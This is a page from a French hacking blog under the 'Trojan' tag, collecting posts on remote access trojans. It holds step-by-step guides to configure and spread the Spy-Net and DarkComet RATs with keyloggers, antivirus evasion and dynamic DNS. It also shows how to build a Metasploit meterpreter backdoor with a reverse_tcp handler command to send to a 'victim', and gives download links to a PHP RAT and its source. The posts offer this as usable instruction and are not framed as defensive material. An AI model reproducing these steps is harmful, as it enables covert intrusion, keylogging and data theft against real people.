Post Populaire

  • Listing d'adresse mail
    Listing d'adresse mail Voila un type de listing de 10 000 adresse mail, j'ai dégoter cette mail-liste employer par des spam...
  • Meziamus.com ou le forum de l'arnaque !
    Nous savions tous déjà que ce forum administrer par Méziane Allali dit "Méziamus" n'a été créer que dans un seul but, pi...
  • Géo-localiser vos Contacts
    Géo-localiser vos Contacts Aujourd’hui nous allons voir comment géolocaliser les adresses d’une liste de contacts et les projeter sur un...
  • Tuto jbonblanc
    Jbonblanc c'est quoi ? C'est un logiciel qui vous permet d'envoyer des mails par un serveur smtp. Un serveur smtp c'est ...
  • Téléchargement Sebdelkil
    Blackbuntu Blackbuntu est la distribution des tests de pénétration qui a été spécialement conçu pour la formation d'étudiants et de p...
  • ZPHCleaner pour un navigateur propre !
    ZPHCleaner  Aujourd'hui présentation de ZPHCleaner. ZHPCleaner rétablie les parametres de votre navigateur, rapide car basé sur...
  • Utiliser des logiciels sans les installés
    J'ai décider de vous parler d'un p'tit soft qui ne mange pas de pain, nous savons bien que ce genre de logiciels existe déjà...
  • Clé d'activation TuneUp Utilities 2014
    Clé d'activation TuneUp Utilities 2014 Ce logiciel est reconnu meilleur logiciel de l'année 2013 a titre d'optimisation...
  • Mail-bombing
    Voici une petite collection de bomber sélectionner par SEBDELKIL,  certain sont vieux d'autres pas très efficace, d'autres très bo...

Affichage des articles dont le libellé est Trojan. Afficher tous les articles

Trojan

Le RAT est également appelé "Outil d'administration à distance" ou encore Trojan.
Il est surtout utilisé à des fins malveillantes, telles que le contrôle de PC cible à distant , le vol de données des victimes, la suppression ou la modification de certains fichiers.
Vous ne pouvez infecter quelqu'un qu'en lui envoyant un fichier appelé "serveur client).
Aujourd'hui, dans cet article, je vais partager encore une RAT appelé "Rat Cerberus" certains pirates sans servent pour pirater et voler des informations à leurs victimes.
Je vous montre comment ils agissent...
Pour configurer Spy-Net RAT ...
Étape 1: Télécharger gratuitement Spy-Net RAT
Etape 2: Maintenant, allez à No-ip.com et inscrivez-vous pourouvrir un compte. Ajouter un hôte, téléchargez No-ip client et vous connecter à votre hôte. Bon alors maintenant il est temps de configurer Spy-Net!
Étape 3: Décompressez Spt-Net [RAT] v2.6-wildhacker puis exécutez le Spy-Net.exe, vous obtiendrez une fenêtre avec un langage bizarre, cliquez sur NON.
Le Spy-Net, cliquez sur Démarrer, puis Opces -> Idioma -> English.ini (Pour changer la langue de SpyNet)
Bon alors maintenant, j'ai téléchargé les photos pour qu'il soit plus facile.
Étape 4: Maintenant, allez dans Fichier -> Créer un serveur -> Sélectionnez l'un des profils
Etape 5: Maintenant, allez à l'onglet Connexion, où il est dit "Your_Dns_here" Cliquez une fois dessus et cliquez sur SUPPRIMER. Puis cliquez sur Ajouter et rédigez votre no-ip adresse, puis cliquez sur Ajouter ou OK.
paypal bidouille
Etape 6: Maintenant, allez à l'onglet Installation, laisser la config comme est l'ai !
pirater mot de passe facebook mot de passe paypal bidouille
Etape 7: Maintenant, allez à l'onglet Keylogger ...
pirater mot de passe facebook mot de passe paypal bidouille
Une option Keylogger est disponible !
Etape 8: Maintenant, allez à l'Anti-Debug TAB ..
pirater mot de passe facebook mot de passe paypal bidouille
Sélectionnez tous, si vous voulez le tester sur Sandboxie, décochez la première case.
Étape 9: Enfin aller à l'onglet Créer serveur .. Il a choisi ce que vous voulez, pour changer l'icône cliquez sur l'icône Image et sélectionner n'importe quel exe ou ico et cliquez sur Créer un bouton Server pour créer le fichier serveur...
pirater mot de passe facebook mot de passe paypal bidouille
Vous avez maintenant configurer le serveur pour Spy-Net RAT, reste plus cas le propager !
Voila une technique employer par certains pirates.

Fans Facebook
Lire la suite
Tag : , , , ,

Tutoriels Trojan

Lire la suite
Tag : , ,

R.A.T sans ouvrir les port

Sebdelkil vous présente une technique utiliser par pas mal de "petit pirate en herbe" technique simple et très efficace malheureusement !
Voyons un peu sont fonctionnement.


-ProXpn (s'incrire et DL le programme)
-No-ip ( s'incrire et créer un domaine et dl no-ip )

Lancé tous d'abor ProXPN , Entrez vos Id et clicker sur Connect !
Une fois apres avoir recu votre nouvelle ip, et seulement apres lancer no-ip !
Double Clicker sur l'icone No-ip en bas a droite
Ensuite, Clicker sur File -> Preference -> et faites comme sur le Screenshots : la Seconde possibilité du menu deroulant !

Image

Et cliqué sur Ok une fois finit !
Maintenant en exécutant votre RAT allez sur l'onglet Sockets/Net cliqué droit dans la zone " listen port " ajoutez le port ,
Votre RAT marche maintenant bien mais pour ne pas avoir a Build+Crypt+Changer le code de la java applet a cause de l'ip dynamique, il est Bien mieux d'avoir un nom de dommaine No-ip ceux qui servira a toujours etre connecter sur vos victimes meme si vous changez d'ip .
Screen D'explication : (RAT utiliser pour le screen: DarkComet mais marche pour 100% des RAT)

Image
Lire la suite
Tag : ,

Creer un backdoor avec Metasploit


Créer un backdoor avec Metasploit

Sebdelkil vous avait déjà présenter un tuto sur Metasploit, Metasploit est une plate-forme Open Source de tests d'intrusion embarquant des fonctionnalités d'automatisation d'exploitation de failles et de création d'exploits.
Outil de prédilection pour nombre d'experts en sécurité, il intègre une base d'exploits (plus d'une centaine). La version 3 du framework, développée en Ruby, apporte notamment une interface Web, de codes d'exploitation pour réseau Wi-Fi ou encore la possibilité de lancer simultanément plusieurs exploits.
Des alternatives commerciales comme Canvas et Core Impact existent également.
Dans ce tuto, je vais vous montrer comment "les pirates" créer des \backdoor/ avec Metasploit sous Backtrack.

Requis:
-Backtrack 5 ( Pas forcement, mais je le fait sur backtrack )
-Metasploit ( Obligatoire ! )

C'est bon, on commence :

1.) Ouvrer le terminal en root

Image IPB

2.) Ensuite taper cette commande :

NOTE: Remplacer LHOST par votre IP a vous et le port vous pouvez le laisser par defaults ou le changer comme vous le souhaiter
TT
Image IPB

Maintenant a ceux stade vous devriez voir sur votre Bureau un "server.exe".
Maintenant vous n'avez plus qu'as l'envoyer a votre victime , vous remarquer qu'il a creer un .exe , donc c'est
reserver au systeme linux . (Quelle encul** ce linux )

3.)Maintenant assurez vous que votre victime est bien ouvert le RAT et entrer cette commande :

msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPROT=4444 E

NOTE : N'oubliez pas remplacer l'ip par la votre et le port par celui que vous avez mis plus haut !!

Image IPB

Maintenant metasploit vas chercher a se connecter sur le pc de la victime !

Image IPB

Maintenant , une fois que vous êtes connecter a la victime vous devriez voir ceci :

Image IPB

Bien joué ! maintenant vous etes connecter a votre victime !

4.) Met que dois je faire après ?
Maintenant vous pouvez utiliser une "floppé" de commande pour vous ammusez avec votre victime !

Redimensionnée à 85% (1366 x 768) - Cliquez pour agrandirImage IPB
Lire la suite
Tag : ,

Infection en masse via Youtube

Infection en masse via Youtube


Un pirate a récemment infecté 122.000 personnes grâce à Youtube et une technique de « Spreading » (ou propagation). Le hacker a utilisé un RAT ou Trojan bien connu sur la toile puisqu’il s’agit de DarkComet.
La méthode utilisée a été la suivante : – Pirate d’un compte partenaire donc avec beaucoup de « vues » : Nichole337
-Publication d’un lien malveillant : Un bon Social Engineering puisque tout le monde fait confiance à ce fameux membre. Les gens font le reste avec des « j’aime » et des publications de liens.
Le hacker n’a plus qu’à attendre ses victimes.
Le RAT (Remote Administration Tool) étant en reverse connection, ce sont les victimes qui se connectent au pirate sans le savoir sur son no-IP (probablement) repassant par un VPN (surement), trop bon!
Pour voir à quoi ressemble, hé vous allez pas êtres déçu, cette jolie Nichole337 qui fournie des explications et excuse à ses fans : http://www.youtube.com/watch?v=xI9R4V1SDVc
Lire la suite
Tag : , , ,

Tuto darkcomet



Tuto darkcomet


Ce tuto va vous montrer comment prendre le contrôle d'un PC à distant.

Nous allons commencer par ouvrir nos ports sous SFR:

1-Allez dans votre navigateur internet

2-Dans la barre d'adresse vous mettez 192.168.1.1

3-Vous tapez vos identifiants

Petit screen pour bien comprendre une fois vos identifiants tapez.



Ensuite vous allez créer votre no-ip en allant sur cette adresse sur....... No-ip

Vous cliquer sur "Create acount" a coter du bouton "login".

Vous remplissez le formulaire d'inscription ensuite je vous laisse regardez les screen :



Etape 1



Etape 2



Etape 3



Etape 4

 

Etape 5

 

Etape 6

Ensuite vous allez télécharger Darkcomet + description de mise en place http://www.multiupload.com/KLK2HX4GZR ou sur le site officiel si vous n'avez pas confiance et que vous ne voulez pas des descriptions de mise en place.

Pour travailler avec votre Trojan, ajouter une exception a votre anti-virus ou désactiver le, je vous conseil quand même la première solution !

Lancer Darkcomet et accepter la charte d'utilisation.

Vous voila dans le sein des sein....La page d'accueil, vous allez voir "+listen" entrez le port que vous avez sélectionnez au par avant.

Pour configurer le serveur vous allez dans "edit server" et vous sélectionnez "Server Module"

Vous obtiendrez ceci:



Pour les paramètres réseaux:



Pour ce qui est du module de démarrage:



La partie "Module Shield":



La partie Keylogger:



Le "Host File" sert a bloquer les sites que vous voudrez a votre victime (a éviter) ou alors juste les sites de scanne en ligne.

Pour ce qui est des icones, si vous voulez ajoutez vos propres icones, vous devrez les placez dans le répertoire Darkcomet.

Pour associer votre serveur a un fichier (binder) regarder ce screen:



Pour donner vie à votre serveur "Build Module".



Pour finir, la partie configuration:



Suite a la demande d'un des visiteur de ce blog, Sebdelkil vous a présenter la création d'un serveur Darkcomet de "A" à "Z" avec le No-ip en prime !
Lire la suite
Tag : ,

DarkComet RAT v5


Bonjour à tous,

je me permet de poster un thread sur la nouvel version de DarkComet même si il en existe déjà.. celui ci a pour but d'etre plus précis car les autres threads ne contienne ni images ni infos.

Voici les principaux changement du logiciel :

- Le design (SIN, File Manager et Webcam capture, j'ai aussi replacer quelques icone pour que tout s'uniformise)
- Le coeur du système est beaucoup plus stable et rapide. (Avant la plus par des fonctions étais codé a la volé maintenant pratiquement tout est objet)
- Le coeur de multithreading a ete améliorer ainsi que la stabilité au niveau du développement Client Serveur utilisant Winsock API
- Le file manager est beaucoup plus stable et professionnel
- Le webcam capture est beaucoup plus pro et de même stable tout comme la capture d'écran
- énormément de bugs corriger
- et plein d'autre bonnes choses

Notez bien si vous utilisez DC dans une machine virtuel veillez bien a désactiver le mode NAT dans les settings et passer en mode Brige !

Prochainement :

- De nouvelles fonctionnalités
- Correction de FF9 pour les pwds
- Plus de plugins et éventuellement un SDK
- Un module unique dans le monde des rats complémentaire au client
- et pleins d'autres bonne choses

Cette version a ete testé sur : Windows XP SP1 2 et 3 ainsi que Windows 7 32 et 64bit , Windows Server 2008 R2 64bit et pour finir Windows 8 preview (tout ete nikel)
Notez juste pour une plus grande liberté lancez les deux modules en mode administrateur !

Dans le pack :

- DarkComet RAT v5
- Celesty Binder
- File extension spoofer
- Des icones

Voici le changelog (en english)
DarkComet-RAT v5 aka Fynlosky*
------------------------------
By DarkCoderSc

- [GUI] The main window had change, dirty buttons removed from the bottom and are now display as tabs in the title bar
- [GUI] Other options such as generate server / downloader / settings etc.. are in the button menu in the title bar then i gain in space for the SIN (static ip notifier)
- [GUI] The EULA/DISCLAMER had changed, read it carefully it contain also lot of informations in the last paragraphs about how to use darkcomet.
- [FUNC] The download file system had totally change, it still multithreaded that means you can download many files from many computers at the same time, but during the file download the current user file manager can't be used, then the transfer will be faster and of course far more stable.
- [FUNC] No more limitation in data sending, now for example you can kill 320 process at the same time, download 1000 files.
- [FUNC] The upload file system had totally change like for the download (see beyound)
- [GUI] Toast GUI had change a bit
- [GUI] File Manager GUI had totally change, it is now more userfriendly pro and less bloated of shit, GUI inspired by TV Software.
- [FUNC] Add usefull shortcuts in the top of both files list in file manager
- [FUNC] Download folder added with recusive option (FAST and STABLE)
- [FUNC] Search manager had been recoded and is now more use friendly, fast, stable and functionnal and the big advantage now it is fully multithreaded (Server and Client) you can cancel a search or cancel the listing after
the reception of the result etc.. it is also fully linked to the file manager to act on the search files easily.
- [GUI] Some icons changed, i try to uniformise all icons step by step
- [DEL] Control center logs removed because useless since few versions
- [DEL] Control center plugins manager removed because useless since many versions @TODO: Make a better one
- [FUNC] Remote shell bug fix for some countries, now it correctly show accents etc..
- [FUNC] Remote shell multithreading been recoded entirely, now it is fully stable
- [FIX] In the users list RAM is now correctly displayed in % used.
- [FUNC] Remote Desktop >> Now the picture compression is directly done by GDI+ API's more fast, stable and consume less memory
- [FIX] Remote Desktop been optimized in threading, speed and stability
- [FIX] Resizing image algorythm been optimized
- [FUNC] Quality bar added in desktop settings
- [FUNC] Remote control for desktop capture been improved
- [FIX] Webcam speed and memory usage is better now multithreading been optimized aswell
- [FUNC] Now you can change the quality of the picture in Webcam capture
- [FIX] A big bug fixed in remoteshell now it doesn't use all the CPU also the GUI change a little bit
- [GUI] New webcam capture design more friendly
- [FIX] Password support now FireFox 9
- [FUNC] SIN Users thumbnail multithreading been revisited and is now faster and stabler
- [FIX] SIN Users thumbnail resizing algo revisited and is also better now
- [FUNC] Main connection handler of the Client Socket was revised
- [FUNC] Main connection handler of the Server Socket was revised now user listing is more smooth fast and stable, it can handle more users
- [FUNC] Better garbage collector
---
* : Fynlosky is the funny name given by Antivirus.
<3 u all !

Quelques images:































Forum officiel : http://www.opensc.ws/
Site officiel : http://darkcomet-rat.com/
By darkcodersc Article sous licence:

Creative Commons License
Lire la suite
Tag : ,

DarkRat PHP




DarkRat PHP

Aujourd'hui je release, un rat que j'ai trouvé pas mal, du fait qu'il n'a pas besoin d'ouverture de port, en effet il utilise un système de contrôle qui passe via un serveur web.
Pratique pour ceux qui ont des problèmes avec le port forwarding.

C'est un RAT PHP comme Lokirat / slickrat qui sont des rat php aussi.

La source en VB est en download en bas de page...

Screen :



Téléchargement
Le lien : http://www.mediafire...bp26augp34zugdj
La source (VB) : http://www.mediafire...ai7p63ykp8w1a57
Source
Lire la suite
Tag : ,

Rechercher dans ce blog

Nombre d'articles

Hé bein ... déjà 871 articles publiés sur le site sebdelkil...

Fouiller dedans...

Un Nuage en Flash par Le Blogger

Formulaire de contact

Nom

E-mail *

Message *

/* Contains the "Load More Posts" functionality */ jQuery( document ).ready( function( $ ) { var next_page = parseInt( ronalfy_load_more.current_page ) + 1; var max_pages = parseInt( ronalfy_load_more.max_pages ); if ( next_page <= max_pages ) { $navi = $( '#content .paging-navigation' ); $navi .html( '
' +'' ); } else{ console.log(next_page+';'+max_pages) } var mt_ajax_load_posts = function() { //Begin Ajax data = { action: 'load_posts', next_page: next_page }; if( typeof $globalcat != 'undefined' ){ data.cat = $globalcat; } $.post( ronalfy_load_more.ajaxurl, data, function( response ) { next_page = response.next_page; max_pages = response.max_pages; //Append the HTML var html = $.parseHTML( response.html ); //html = $( html ).filter( '.type-post' ); //console.log('dodajemo gore'); $('#content section.post-item:last').after(html); //If the next page exceeds the number of pages available, get rid of the navigation if ( next_page > max_pages ) { $( '.paging-navigation' ).html( '' ); } //Fade out loading img and fade in loading text $( '.load_more' ).html('Load More'); }, 'json' ); }; //Clicking the load more button $( '.paging-navigation' ).on( 'click', '.load_more', function( e ) { e.preventDefault(); $( '.load_more' ).html('Loading...'); mt_ajax_load_posts(); } ); } );

- sebdelkil 2009-2015 - Aucun droit réservé -